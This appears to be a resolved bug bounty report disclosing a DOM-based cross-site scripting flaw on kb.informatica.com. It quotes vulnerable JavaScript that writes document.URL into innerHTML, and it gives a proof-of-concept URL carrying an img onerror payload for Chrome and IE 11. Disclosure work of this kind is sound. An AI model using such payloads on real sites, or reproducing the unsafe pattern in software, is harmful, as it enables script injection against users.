Loading HuntDB...

[kb.informatica.com] Dom Based xss

Medium
I
Informatica
Submitted None
Reported by e3xpl0it

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Hi! I found Dom based xss on this subdomain https://kb.informatica.com javaScript security is very important, even more in portals where users store their personal data. Attackers can target those portals to find and exploit High-risk JavaScript vulnerabilities like Dom based xss vulnerabilities POC ,the vulnerable code javascript on this page https://kb.informatica.com/KBExternal/pages/infasearchltd.aspx? view-source: string 1406 /*google chrome var li = document.createElement("li"); strChild = "<a href="+document.URL+" style='color:#fff !important;font-size:10px'>Search Results</a>"; li.innerHTML = strChild; document.getElementById('DynamicBreadcrumb').appendChild(li); } attack scenario the latest versions of browsers google chrome https://kb.informatica.com/KBExternal/pages/infasearchltd.aspx?#"><img src=x onerror=alert(document.domain)>&infasearch.aspx=hek IE 11 https://kb.informatica.com/KBExternal/pages/infasearchltd.aspx?#"><img src=x onerror=alert(document.domain)>&infasearch.aspx=hek

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Generic